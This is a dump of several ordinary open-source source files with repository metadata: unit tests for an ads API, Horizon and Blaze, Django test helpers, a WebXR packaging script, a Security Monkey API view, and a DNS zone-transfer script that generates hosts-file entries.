repo_name (string, 5-100 chars) | path (string, 4-375 chars) | copies (class label, 991 values) | size (string, 4-7 chars) | content (string, 666-1M chars) | license (class label, 15 values)
---|---|---|---|---|---|
lociii/googleads-python-lib | tests/adspygoogle/dfa/v1_18/change_log_service_unittest.py | 3 | 4199 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests to cover ChangeLogService."""
__author__ = 'api.jdilallo@gmail.com (Joseph DiLallo)'
import os
import sys
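# Make the repository root importable so the tests.adspygoogle packages below resolve.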
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
import unittest
from tests.adspygoogle.dfa.v1_18 import client
from tests.adspygoogle.dfa.v1_18 import HTTP_PROXY
from tests.adspygoogle.dfa.v1_18 import SERVER_V1_18
from tests.adspygoogle.dfa.v1_18 import VERSION_V1_18
class ChangeLogServiceTestV1_18(unittest.TestCase):
"""Unittest suite for ChangeLogService using v1_18."""
SERVER = SERVER_V1_18
VERSION = VERSION_V1_18
client.debug = False
service = None
advertiser_id = '0'
change_log_record_id = '0'
def setUp(self):
"""Prepare unittest."""
print self.id()
if not self.__class__.service:
self.__class__.service = client.GetChangeLogService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
advertiser_service = client.GetAdvertiserService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
search_criteria = {}
self.__class__.advertiser_id = advertiser_service.GetAdvertisers(
search_criteria)[0]['records'][0]['id']
def testGetChangeLogObjectTypes(self):
"""Test whether we can fetch object types that support change logs."""
self.assert_(isinstance(self.__class__.service.GetChangeLogObjectTypes(),
tuple))
def testGetChangeLogRecord(self):
"""Test whether we can fetch a change log record."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
self.assert_(isinstance(self.__class__.service.GetChangeLogRecord(
change_log_record_id), tuple))
def testGetChangeLogRecordForObjectType(self):
"""Test whether we can fetch change log record for given id and object type.
"""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
object_type_id = '1'
self.assert_(isinstance(
self.__class__.service.GetChangeLogRecordForObjectType(
change_log_record_id, object_type_id), tuple))
def testGetChangeLogRecords(self):
"""Test whether we can fetch change log records."""
criteria = {
'objectId': self.__class__.advertiser_id
}
records = self.__class__.service.GetChangeLogRecords(criteria)
self.__class__.change_log_record_id = records[0]['records'][0]['id']
self.assert_(isinstance(records, tuple))
def testUpdateChangeLogRecordComments(self):
"""Test whether we can update change log record comments."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
comments = 'This is a cool change!'
self.assertEqual(self.__class__.service.UpdateChangeLogRecordComments(
change_log_record_id, comments), None)
def testUpdateChangeLogRecordCommentsForObjectType(self):
"""Test whether we can update change log record comments for object type."""
if self.__class__.change_log_record_id == '0':
self.testGetChangeLogRecords()
change_log_record_id = self.__class__.change_log_record_id
comments = 'This is a very cool change!'
object_type_id = '1'
self.assertEqual(
self.__class__.service.UpdateChangeLogRecordCommentsForObjectType(
change_log_record_id, comments, object_type_id), None)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
timevortexproject/timevortex | features/steps/test_globals.py | 1 | 2400 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Functionnal test toolkit"""
import shutil
from os.path import exists
from django.conf import settings
from timevortex.utils.filestorage import SETTINGS_FILE_STORAGE_FOLDER, SETTINGS_DEFAULT_FILE_STORAGE_FOLDER
from weather.utils.globals import SETTINGS_STUBS_METEAR_URL, SETTINGS_METEAR_URL
from weather.utils.globals import SETTINGS_STUBS_METEAR_START_DATE
from weather.models import set_metear_start_date
SOCAT = "socat"
TIMEVORTEX_LOG_FILE = "/tmp/timevortex/timevortex.log"
DICT_JSON_REQUEST_HEADER = {'Content-type': 'application/json', 'Accept': '*/*'}
STUBS_COMMAND = "python manage.py runserver 0.0.0.0:8000"
KEY_LABEL = "label"
KEY_SITE_TYPE = "site_type"
WITH_STUBS = "with_stubs"
def reset_testing_environment():
data_folder = getattr(settings, SETTINGS_FILE_STORAGE_FOLDER, SETTINGS_DEFAULT_FILE_STORAGE_FOLDER)
if exists(data_folder):
shutil.rmtree(data_folder)
setattr(settings, SETTINGS_METEAR_URL, SETTINGS_STUBS_METEAR_URL)
set_metear_start_date(SETTINGS_STUBS_METEAR_START_DATE)
def assert_equal(element1, element2):
try:
assert element1 in element2, "%s should equal %s" % (element1, element2)
except TypeError:
assert element1 == element2, "%s should equal %s" % (element1, element2)
def assert_gte(element1, element2):
assert element1 >= element2, "%s should be gte to %s" % (element1, element2)
def assert_lte(element1, element2):
assert element1 <= element2, "%s should be lte to %s" % (element1, element2)
def read_log(log_file_path, line):
log_file = open(log_file_path, "r")
lines = log_file.readlines()
log_file.close()
body = lines[line]
# log_message = "1. => %s" % body
# LOGGER.debug(log_message)
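# Keep only the log message: drop the first nine space-separated fields and the trailing newline.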
body = " ".join(body.split(" ")[9:])[:-1]
# log_message = "2. => %s" % body
# LOGGER.debug(log_message)
return body
def counter_from_log(word, expected_occurency, log_file_path, line):
from collections import Counter
body = read_log(log_file_path, line)
c = Counter()
for line in body.splitlines():
c.update(line.split())
if expected_occurency == 0:
assert word not in c, "%s should not be in %s" % (word, c)
else:
assert word in c, "%s should be in %s" % (word, c)
assert_equal(c[word], expected_occurency)
| mit |
ric2b/Vivaldi-browser | chromium/third_party/webxr_test_pages/make_ot_samples_folder.py | 10 | 1244 | #!/usr/bin/env python
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import shutil
import sys
samples_pages = [
'xr-barebones.html',
'magic-window.html',
'teleportation.html',
'gamepad.html'
]
other_pages = [
'attribution.html',
'favicon-32x32.png',
'favicon-96x96.png',
'favicon.ico',
'LICENSE.md'
]
copy_folders = [
'css',
'js'
]
def make_ot_samples_folder(source, dest):
os.mkdir(dest)
for f in samples_pages:
shutil.copy(os.path.join(source, f), dest)
for f in other_pages:
shutil.copy(os.path.join(source, f), dest)
for f in copy_folders:
shutil.copytree(os.path.join(source, f), os.path.join(dest, f))
shutil.copy(
os.path.join(source, 'index.published.html'),
os.path.join(dest, 'index.html'))
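# Archive the prepared folder as source.zip and move the archive into it.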
shutil.make_archive('source', 'zip', dest)
shutil.move('source.zip', dest)
# media folder won't be included in the zip file or uploaded in any way as
# part of this process
shutil.copytree(os.path.join(source, 'media'), os.path.join(dest, 'media'))
def main():
make_ot_samples_folder(sys.argv[1], sys.argv[2])
if __name__ == '__main__':
main()
| bsd-3-clause |
r-icarus/openstack_microserver | horizon/test/tests/messages.py | 10 | 2373 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django import http
from django.utils.encoding import force_unicode # noqa
from django.utils.safestring import mark_safe # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import messages
from horizon import middleware
from horizon.test import helpers as test
class MessageTests(test.TestCase):
def test_middleware_header(self):
req = self.request
string = "Giant ants are attacking San Francisco!"
expected = ["error", force_unicode(string), ""]
self.assertTrue("async_messages" in req.horizon)
self.assertItemsEqual(req.horizon['async_messages'], [])
req.META['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest'
messages.error(req, string)
self.assertItemsEqual(req.horizon['async_messages'], [expected])
res = http.HttpResponse()
res = middleware.HorizonMiddleware().process_response(req, res)
self.assertEqual(res['X-Horizon-Messages'],
json.dumps([expected]))
def test_safe_message(self):
req = self.request
string = mark_safe("We are now safe from ants! Go <a>here</a>!")
expected = ["error", force_unicode(string), " safe"]
self.assertTrue("async_messages" in req.horizon)
self.assertItemsEqual(req.horizon['async_messages'], [])
req.META['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest'
messages.error(req, string)
self.assertItemsEqual(req.horizon['async_messages'], [expected])
res = http.HttpResponse()
res = middleware.HorizonMiddleware().process_response(req, res)
self.assertEqual(res['X-Horizon-Messages'],
json.dumps([expected]))
| apache-2.0 |
bunjiboys/security_monkey | security_monkey/views/distinct.py | 1 | 6408 | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from security_monkey.views import AuthenticatedService
from security_monkey.datastore import Item
from security_monkey.datastore import Account
from security_monkey.datastore import Technology
from security_monkey.datastore import ItemRevision
from security_monkey import rbac
from flask_restful import reqparse
from sqlalchemy.sql.expression import func
import json
class Distinct(AuthenticatedService):
decorators = [
rbac.allow(["View"], ["GET"])
]
def __init__(self):
self.reqparse = reqparse.RequestParser()
super(Distinct, self).__init__()
def get(self, key_id):
"""
.. http:get:: /api/1/distinct
Get a list of distinct regions, names, accounts, or technologies
**Example Request**:
.. sourcecode:: http
GET /api/1/distinct/name HTTP/1.1
Host: example.com
Accept: application/json, text/javascript
**Example Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
:statuscode 200: no error
"""
self.reqparse.add_argument('count', type=int, default=30, location='args')
self.reqparse.add_argument('page', type=int, default=1, location='args')
self.reqparse.add_argument('select2', type=str, default="", location='args')
self.reqparse.add_argument('searchconfig', type=str, default="", location='args')
self.reqparse.add_argument('regions', type=str, default=None, location='args')
self.reqparse.add_argument('accounts', type=str, default=None, location='args')
self.reqparse.add_argument('technologies', type=str, default=None, location='args')
self.reqparse.add_argument('names', type=str, default=None, location='args')
self.reqparse.add_argument('active', type=str, default=None, location='args')
args = self.reqparse.parse_args()
page = args.pop('page', None)
count = args.pop('count', None)
q = args.pop('searchconfig', "").lower()
select2 = args.pop('select2', "")
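# Drop empty filter arguments so they do not constrain the query built below.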
for k, v in args.items():
if not v:
del args[k]
if select2.lower() == 'true':
select2 = True
else:
select2 = False
query = Item.query
query = query.join((Account, Account.id == Item.account_id))
query = query.join((Technology, Technology.id == Item.tech_id))
query = query.join((ItemRevision, Item.latest_revision_id == ItemRevision.id))
if 'regions' in args and key_id != 'region':
regions = args['regions'].split(',')
query = query.filter(Item.region.in_(regions))
if 'accounts' in args and key_id != 'account':
accounts = args['accounts'].split(',')
query = query.filter(Account.name.in_(accounts))
if 'technologies' in args and key_id != 'tech':
technologies = args['technologies'].split(',')
query = query.filter(Technology.name.in_(technologies))
if 'names' in args and key_id != 'name':
names = args['names'].split(',')
query = query.filter(Item.name.in_(names))
if 'arns' in args and key_id != 'arn':
names = args['arns'].split(',')
query = query.filter(Item.arn.in_(names))
if 'active' in args:
active = args['active'].lower() == "true"
query = query.filter(ItemRevision.active == active)
if key_id == 'tech':
if select2:
query = query.distinct(Technology.name).filter(func.lower(Technology.name).like('%' + q + '%'))
else:
query = query.distinct(Technology.name)
elif key_id == 'account':
if select2:
query = query.filter(Account.third_party == False)
query = query.distinct(Account.name).filter(func.lower(Account.name).like('%' + q + '%'))
else:
query = query.distinct(Account.name)
else:
filter_by = None
if key_id == "region":
filter_by = Item.region
elif key_id == "name":
filter_by = Item.name
elif key_id == "arn":
filter_by = Item.arn
else:
return json.loads('{ "error": "Supply key in type,region,account,name,arn" }')
if select2:
query = query.distinct(filter_by).filter(func.lower(filter_by).like('%' + q + '%'))
else:
query = query.distinct(filter_by)
items = query.paginate(page, count, error_out=False)
marshaled_dict = {}
list_distinct = []
for item in items.items:
if key_id == "tech":
text = item.technology.name
item_id = item.id
elif key_id == "account":
text = item.account.name
item_id = item.id
elif key_id == "region":
text = item.region
item_id = item.id
elif key_id == "name":
text = item.name
item_id = item.id
elif key_id == "arn":
text = item.arn
item_id = item.id
if(select2):
list_distinct.append({"id": item_id, "text": text})
else:
list_distinct.append(text)
marshaled_dict['auth'] = self.auth_dict
marshaled_dict['items'] = list_distinct
marshaled_dict['page'] = items.page
marshaled_dict['total'] = items.total
marshaled_dict['key_id'] = key_id
return marshaled_dict, 200
| apache-2.0 |
jiasir/get-dns | get-dns.py | 1 | 1999 | #!/usr/bin/env python
__author__ = 'Taio'
import os
import os.path
import dns.query
import dns.zone
import logging
from utils.noflib import Noflib
run = Noflib()
logger = logging.getLogger('get-dns')
logging.basicConfig(filename='/var/log/get-dns/get-dns.log', level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
dcAdd = '172.20.10.75'
domainName = 'spidc1.com'
z = dns.zone.from_xfr(dns.query.xfr(dcAdd, domainName))
names = z.nodes.keys()
names.sort()
def get_client_hosts():
with open('client_hosts', 'r') as f:
return f.read()
def print_local_host():
print '127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4'
print '::1 localhost localhost.localdomain localhost6 localhost6.localdomain6'
def print_records_stdout():
"""Print records only to stdout"""
for i in names:
line = z[i].to_text(i).split()
logger.info(line[3])
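# Field 3 of the zone record text is the record type and field 4 its value; only A records become hosts entries.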
if line[3] == 'A':
logger.info(line[4])
new_line = line[4] + ' ' + line[0] + '.spidc1.com'
if new_line not in get_except_hosts():
logger.info(new_line)
print new_line
def gen_records_spidc1():
"""Write to /etc/hosts file"""
try:
with open('/etc/hosts', 'a') as f:
for i in names:
f.write(z[i].to_text(i))
except IOError:
logger.error(IOError.__doc__)
print IOError.__doc__
def get_except_hosts():
"""
Get Linux hosts file.
:return string:
"""
with open('except_hosts', 'r') as h:
return h.read()
def main():
if not os.path.exists('/var/log/get-dns'):
run.execute_get_output('sudo', 'mkdir', '/var/log/get-dns')
print_local_host()
print_records_stdout()
print get_client_hosts()
if __name__ == '__main__':
if os.getuid() == 0:
main()
else:
print 'You do not have permission, please run as root.'
exit() | mit |
maxalbert/blaze | blaze/compute/tests/test_numpy_compute.py | 3 | 16537 | from __future__ import absolute_import, division, print_function
import pytest
import numpy as np
import pandas as pd
from datetime import datetime, date
from blaze.compute.core import compute, compute_up
from blaze.expr import symbol, by, exp, summary, Broadcast, join, concat
from blaze import sin
from odo import into
from datashape import discover, to_numpy, dshape
x = np.array([(1, 'Alice', 100),
(2, 'Bob', -200),
(3, 'Charlie', 300),
(4, 'Denis', 400),
(5, 'Edith', -500)],
dtype=[('id', 'i8'), ('name', 'S7'), ('amount', 'i8')])
t = symbol('t', discover(x))
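# Helper: compare expected and computed results, collapsing element-wise ndarray comparisons to a single boolean.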
def eq(a, b):
c = a == b
if isinstance(c, np.ndarray):
return c.all()
return c
def test_symbol():
assert eq(compute(t, x), x)
def test_eq():
assert eq(compute(t['amount'] == 100, x),
x['amount'] == 100)
def test_selection():
assert eq(compute(t[t['amount'] == 100], x), x[x['amount'] == 100])
assert eq(compute(t[t['amount'] < 0], x), x[x['amount'] < 0])
def test_arithmetic():
assert eq(compute(t['amount'] + t['id'], x),
x['amount'] + x['id'])
assert eq(compute(t['amount'] * t['id'], x),
x['amount'] * x['id'])
assert eq(compute(t['amount'] % t['id'], x),
x['amount'] % x['id'])
def test_UnaryOp():
assert eq(compute(exp(t['amount']), x),
np.exp(x['amount']))
assert eq(compute(abs(-t['amount']), x),
abs(-x['amount']))
def test_Neg():
assert eq(compute(-t['amount'], x),
-x['amount'])
def test_invert_not():
assert eq(compute(~(t.amount > 0), x),
~(x['amount'] > 0))
def test_Reductions():
assert compute(t['amount'].mean(), x) == x['amount'].mean()
assert compute(t['amount'].count(), x) == len(x['amount'])
assert compute(t['amount'].sum(), x) == x['amount'].sum()
assert compute(t['amount'].min(), x) == x['amount'].min()
assert compute(t['amount'].max(), x) == x['amount'].max()
assert compute(t['amount'].nunique(), x) == len(np.unique(x['amount']))
assert compute(t['amount'].var(), x) == x['amount'].var()
assert compute(t['amount'].std(), x) == x['amount'].std()
assert compute(t['amount'].var(unbiased=True), x) == x['amount'].var(ddof=1)
assert compute(t['amount'].std(unbiased=True), x) == x['amount'].std(ddof=1)
assert compute((t['amount'] > 150).any(), x) == True
assert compute((t['amount'] > 250).all(), x) == False
assert compute(t['amount'][0], x) == x['amount'][0]
assert compute(t['amount'][-1], x) == x['amount'][-1]
def test_count_string():
s = symbol('name', 'var * ?string')
x = np.array(['Alice', np.nan, 'Bob', 'Denis', 'Edith'], dtype='object')
assert compute(s.count(), x) == 4
def test_reductions_on_recarray():
assert compute(t.count(), x) == len(x)
def test_count_nan():
t = symbol('t', '3 * ?real')
x = np.array([1.0, np.nan, 2.0])
assert compute(t.count(), x) == 2
def test_distinct():
x = np.array([('Alice', 100),
('Alice', -200),
('Bob', 100),
('Bob', 100)],
dtype=[('name', 'S5'), ('amount', 'i8')])
t = symbol('t', 'var * {name: string, amount: int64}')
assert eq(compute(t['name'].distinct(), x),
np.unique(x['name']))
assert eq(compute(t.distinct(), x),
np.unique(x))
def test_distinct_on_recarray():
rec = pd.DataFrame(
[[0, 1],
[0, 2],
[1, 1],
[1, 2]],
columns=('a', 'b'),
).to_records(index=False)
s = symbol('s', discover(rec))
assert (
compute(s.distinct('a'), rec) ==
pd.DataFrame(
[[0, 1],
[1, 1]],
columns=('a', 'b'),
).to_records(index=False)
).all()
def test_distinct_on_structured_array():
arr = np.array(
[(0., 1.),
(0., 2.),
(1., 1.),
(1., 2.)],
dtype=[('a', 'f4'), ('b', 'f4')],
)
s = symbol('s', discover(arr))
assert(
compute(s.distinct('a'), arr) ==
np.array([(0., 1.), (1., 1.)], dtype=arr.dtype)
).all()
def test_distinct_on_str():
rec = pd.DataFrame(
[['a', 'a'],
['a', 'b'],
['b', 'a'],
['b', 'b']],
columns=('a', 'b'),
).to_records(index=False).astype([('a', '<U1'), ('b', '<U1')])
s = symbol('s', discover(rec))
assert (
compute(s.distinct('a'), rec) ==
pd.DataFrame(
[['a', 'a'],
['b', 'a']],
columns=('a', 'b'),
).to_records(index=False).astype([('a', '<U1'), ('b', '<U1')])
).all()
def test_sort():
assert eq(compute(t.sort('amount'), x),
np.sort(x, order='amount'))
assert eq(compute(t.sort('amount', ascending=False), x),
np.sort(x, order='amount')[::-1])
assert eq(compute(t.sort(['amount', 'id']), x),
np.sort(x, order=['amount', 'id']))
assert eq(compute(t.amount.sort(), x),
np.sort(x['amount']))
def test_head():
assert eq(compute(t.head(2), x),
x[:2])
def test_tail():
assert eq(compute(t.tail(2), x),
x[-2:])
def test_label():
expected = x['amount'] * 10
expected = np.array(expected, dtype=[('foo', 'i8')])
assert eq(compute((t['amount'] * 10).label('foo'), x),
expected)
def test_relabel():
expected = np.array(x, dtype=[('ID', 'i8'), ('NAME', 'S7'), ('amount', 'i8')])
result = compute(t.relabel({'name': 'NAME', 'id': 'ID'}), x)
assert result.dtype.names == expected.dtype.names
assert eq(result, expected)
def test_by():
expr = by(t.amount > 0, count=t.id.count())
result = compute(expr, x)
assert set(map(tuple, into(list, result))) == set([(False, 2), (True, 3)])
def test_compute_up_field():
assert eq(compute(t['name'], x), x['name'])
def test_compute_up_projection():
assert eq(compute_up(t[['name', 'amount']], x), x[['name', 'amount']])
ax = np.arange(30, dtype='f4').reshape((5, 3, 2))
a = symbol('a', discover(ax))
def test_slice():
inds = [0, slice(2), slice(1, 3), slice(None, None, 2), [1, 2, 3],
(0, 1), (0, slice(1, 3)), (slice(0, 3), slice(3, 1, -1)),
(0, [1, 2])]
for s in inds:
assert (compute(a[s], ax) == ax[s]).all()
def test_array_reductions():
for axis in [None, 0, 1, (0, 1), (2, 1)]:
assert eq(compute(a.sum(axis=axis), ax), ax.sum(axis=axis))
assert eq(compute(a.std(axis=axis), ax), ax.std(axis=axis))
def test_array_reductions_with_keepdims():
for axis in [None, 0, 1, (0, 1), (2, 1)]:
assert eq(compute(a.sum(axis=axis, keepdims=True), ax),
ax.sum(axis=axis, keepdims=True))
def test_summary_on_ndarray():
assert compute(summary(total=a.sum(), min=a.min()), ax) == \
(ax.min(), ax.sum())
result = compute(summary(total=a.sum(), min=a.min(), keepdims=True), ax)
expected = np.array([(ax.min(), ax.sum())],
dtype=[('min', 'float32'), ('total', 'float64')])
assert result.ndim == ax.ndim
assert eq(expected, result)
def test_summary_on_ndarray_with_axis():
for axis in [0, 1, (1, 0)]:
expr = summary(total=a.sum(), min=a.min(), axis=axis)
result = compute(expr, ax)
shape, dtype = to_numpy(expr.dshape)
expected = np.empty(shape=shape, dtype=dtype)
expected['total'] = ax.sum(axis=axis)
expected['min'] = ax.min(axis=axis)
assert eq(result, expected)
def test_utcfromtimestamp():
t = symbol('t', '1 * int64')
data = np.array([0, 1])
expected = np.array(['1970-01-01T00:00:00Z', '1970-01-01T00:00:01Z'],
dtype='M8[us]')
assert eq(compute(t.utcfromtimestamp, data), expected)
def test_nelements_structured_array():
assert compute(t.nelements(), x) == len(x)
assert compute(t.nelements(keepdims=True), x) == (len(x),)
def test_nelements_array():
t = symbol('t', '5 * 4 * 3 * float64')
x = np.random.randn(*t.shape)
result = compute(t.nelements(axis=(0, 1)), x)
np.testing.assert_array_equal(result, np.array([20, 20, 20]))
result = compute(t.nelements(axis=1), x)
np.testing.assert_array_equal(result, 4 * np.ones((5, 3)))
def test_nrows():
assert compute(t.nrows, x) == len(x)
dts = np.array(['2000-06-25T12:30:04Z', '2000-06-28T12:50:05Z'],
dtype='M8[us]')
s = symbol('s', 'var * datetime')
def test_datetime_truncation():
assert eq(compute(s.truncate(1, 'day'), dts),
dts.astype('M8[D]'))
assert eq(compute(s.truncate(2, 'seconds'), dts),
np.array(['2000-06-25T12:30:04Z', '2000-06-28T12:50:04Z'],
dtype='M8[s]'))
assert eq(compute(s.truncate(2, 'weeks'), dts),
np.array(['2000-06-18', '2000-06-18'], dtype='M8[D]'))
assert into(list, compute(s.truncate(1, 'week'), dts))[0].isoweekday() == 7
def test_hour():
dts = [datetime(2000, 6, 20, 1, 00, 00),
datetime(2000, 6, 20, 12, 59, 59),
datetime(2000, 6, 20, 12, 00, 00),
datetime(2000, 6, 20, 11, 59, 59)]
dts = into(np.ndarray, dts)
assert eq(compute(s.truncate(1, 'hour'), dts),
into(np.ndarray, [datetime(2000, 6, 20, 1, 0),
datetime(2000, 6, 20, 12, 0),
datetime(2000, 6, 20, 12, 0),
datetime(2000, 6, 20, 11, 0)]))
def test_month():
dts = [datetime(2000, 7, 1),
datetime(2000, 6, 30),
datetime(2000, 6, 1),
datetime(2000, 5, 31)]
dts = into(np.ndarray, dts)
assert eq(compute(s.truncate(1, 'month'), dts),
into(np.ndarray, [date(2000, 7, 1),
date(2000, 6, 1),
date(2000, 6, 1),
date(2000, 5, 1)]))
def test_truncate_on_np_datetime64_scalar():
s = symbol('s', 'datetime')
data = np.datetime64('2000-01-02T12:30:00Z')
assert compute(s.truncate(1, 'day'), data) == data.astype('M8[D]')
def test_numpy_and_python_datetime_truncate_agree_on_start_of_week():
s = symbol('s', 'datetime')
n = np.datetime64('2014-11-11')
p = datetime(2014, 11, 11)
expr = s.truncate(1, 'week')
assert compute(expr, n) == compute(expr, p)
def test_add_multiple_ndarrays():
a = symbol('a', '5 * 4 * int64')
b = symbol('b', '5 * 4 * float32')
x = np.arange(9, dtype='int64').reshape(3, 3)
y = (x + 1).astype('float32')
expr = sin(a) + 2 * b
scope = {a: x, b: y}
expected = sin(x) + 2 * y
# check that we cast correctly
assert expr.dshape == dshape('5 * 4 * float64')
np.testing.assert_array_equal(compute(expr, scope), expected)
np.testing.assert_array_equal(compute(expr, scope, optimize=False),
expected)
nA = np.arange(30, dtype='f4').reshape((5, 6))
ny = np.arange(6, dtype='f4')
A = symbol('A', discover(nA))
y = symbol('y', discover(ny))
def test_transpose():
assert eq(compute(A.T, nA), nA.T)
assert eq(compute(A.transpose((0, 1)), nA), nA)
def test_dot():
assert eq(compute(y.dot(y), {y: ny}), np.dot(ny, ny))
assert eq(compute(A.dot(y), {A: nA, y: ny}), np.dot(nA, ny))
def test_subexpr_datetime():
data = pd.date_range(start='01/01/2010', end='01/04/2010', freq='D').values
s = symbol('s', discover(data))
result = compute(s.truncate(days=2).day, data)
expected = np.array([31, 2, 2, 4])
np.testing.assert_array_equal(result, expected)
def test_mixed_types():
x = np.array([[(4, 180), (4, 184), (4, 188), (4, 192), (4, 196)],
[(4, 660), (4, 664), (4, 668), (4, 672), (4, 676)],
[(4, 1140), (4, 1144), (4, 1148), (4, 1152), (4, 1156)],
[(4, 1620), (4, 1624), (4, 1628), (4, 1632), (4, 1636)],
[(4, 2100), (4, 2104), (4, 2108), (4, 2112), (4, 2116)]],
dtype=[('count', '<i4'), ('total', '<i8')])
aggregate = symbol('aggregate', discover(x))
result = compute(aggregate.total.sum(axis=(0,)) /
aggregate.count.sum(axis=(0,)), x)
expected = (x['total'].sum(axis=0, keepdims=True) /
x['count'].sum(axis=0, keepdims=True)).squeeze()
np.testing.assert_array_equal(result, expected)
def test_broadcast_compute_against_numbers_and_arrays():
A = symbol('A', '5 * float32')
a = symbol('a', 'float32')
b = symbol('b', 'float32')
x = np.arange(5, dtype='f4')
expr = Broadcast((A, b), (a, b), a + b)
result = compute(expr, {A: x, b: 10})
assert eq(result, x + 10)
def test_map():
pytest.importorskip('numba')
a = np.arange(10.0)
f = lambda x: np.sin(x) + 1.03 * np.cos(x) ** 2
x = symbol('x', discover(a))
expr = x.map(f, 'float64')
result = compute(expr, a)
expected = f(a)
# make sure we're not going to pandas here
assert type(result) == np.ndarray
assert type(result) == type(expected)
np.testing.assert_array_equal(result, expected)
def test_vector_norm():
x = np.arange(30).reshape((5, 6))
s = symbol('x', discover(x))
assert eq(compute(s.vnorm(), x),
np.linalg.norm(x))
assert eq(compute(s.vnorm(ord=1), x),
np.linalg.norm(x.flatten(), ord=1))
assert eq(compute(s.vnorm(ord=4, axis=0), x),
np.linalg.norm(x, ord=4, axis=0))
expr = s.vnorm(ord=4, axis=0, keepdims=True)
assert expr.shape == compute(expr, x).shape
def test_join():
cities = np.array([('Alice', 'NYC'),
('Alice', 'LA'),
('Bob', 'Chicago')],
dtype=[('name', 'S7'), ('city', 'O')])
c = symbol('cities', discover(cities))
expr = join(t, c, 'name')
result = compute(expr, {t: x, c: cities})
assert (b'Alice', 1, 100, 'LA') in into(list, result)
def test_query_with_strings():
b = np.array([('a', 1), ('b', 2), ('c', 3)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
assert compute(s[s.x == b'b'], b).tolist() == [(b'b', 2)]
@pytest.mark.parametrize('keys', [['a'], list('bc')])
def test_isin(keys):
b = np.array([('a', 1), ('b', 2), ('c', 3), ('a', 4), ('c', 5), ('b', 6)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
result = compute(s.x.isin(keys), b)
expected = np.in1d(b['x'], keys)
np.testing.assert_array_equal(result, expected)
def test_nunique_recarray():
b = np.array([('a', 1), ('b', 2), ('c', 3), ('a', 4), ('c', 5), ('b', 6),
('a', 1), ('b', 2)],
dtype=[('x', 'S1'), ('y', 'i4')])
s = symbol('s', discover(b))
expr = s.nunique()
assert compute(expr, b) == len(np.unique(b))
def test_str_repeat():
a = np.array(('a', 'b', 'c'))
s = symbol('s', discover(a))
expr = s.repeat(3)
assert all(compute(expr, a) == np.char.multiply(a, 3))
def test_str_interp():
a = np.array(('%s', '%s', '%s'))
s = symbol('s', discover(a))
expr = s.interp(1)
assert all(compute(expr, a) == np.char.mod(a, 1))
def test_timedelta_arith():
dates = np.arange('2014-01-01', '2014-02-01', dtype='datetime64')
delta = np.timedelta64(1, 'D')
sym = symbol('s', discover(dates))
assert (compute(sym + delta, dates) == dates + delta).all()
assert (compute(sym - delta, dates) == dates - delta).all()
def test_coerce():
x = np.arange(1, 3)
s = symbol('s', discover(x))
np.testing.assert_array_equal(compute(s.coerce('float64'), x),
np.arange(1.0, 3.0))
def test_concat_arr():
s_data = np.arange(15)
t_data = np.arange(15, 30)
s = symbol('s', discover(s_data))
t = symbol('t', discover(t_data))
assert (
compute(concat(s, t), {s: s_data, t: t_data}) ==
np.arange(30)
).all()
def test_concat_mat():
s_data = np.arange(15).reshape(5, 3)
t_data = np.arange(15, 30).reshape(5, 3)
s = symbol('s', discover(s_data))
t = symbol('t', discover(t_data))
assert (
compute(concat(s, t), {s: s_data, t: t_data}) ==
np.arange(30).reshape(10, 3)
).all()
assert (
compute(concat(s, t, axis=1), {s: s_data, t: t_data}) ==
np.concatenate((s_data, t_data), axis=1)
).all()
| bsd-3-clause |
Epirex/android_external_chromium_org | third_party/closure_linter/closure_linter/common/erroroutput.py | 266 | 1549 | #!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
